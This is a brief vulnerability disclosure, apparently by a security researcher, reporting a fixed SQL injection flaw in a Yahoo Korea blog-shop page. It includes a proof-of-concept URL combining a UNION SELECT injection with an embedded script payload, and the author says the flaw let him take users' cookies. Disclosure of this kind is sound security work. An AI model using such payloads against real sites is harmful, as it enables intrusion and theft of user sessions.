Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed
Overview:
Yahoo Korea having Blog-shop which is one of the most famous sub domain in Korea .
A cross-site-scripting (XSS) vulnerability affecting blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.
Exploit Description :
It has Sql injection in the notice_read.html?key script . I was Successful for retrieving the yahoo users cookies from this SQL Injection by inserting JAVA-Script into the SQL Injection payload.
POC (Proof Of Concept ):
http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16’/**/UNION/**/SELECT/**/1,2,3,4,@@version,%
3Cscript%3Ealert(‘XSS HERE’);</script>,7,8,9,0,1,2,3,4,5,6,7–%20
Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)
Regard
Sandeep Kamble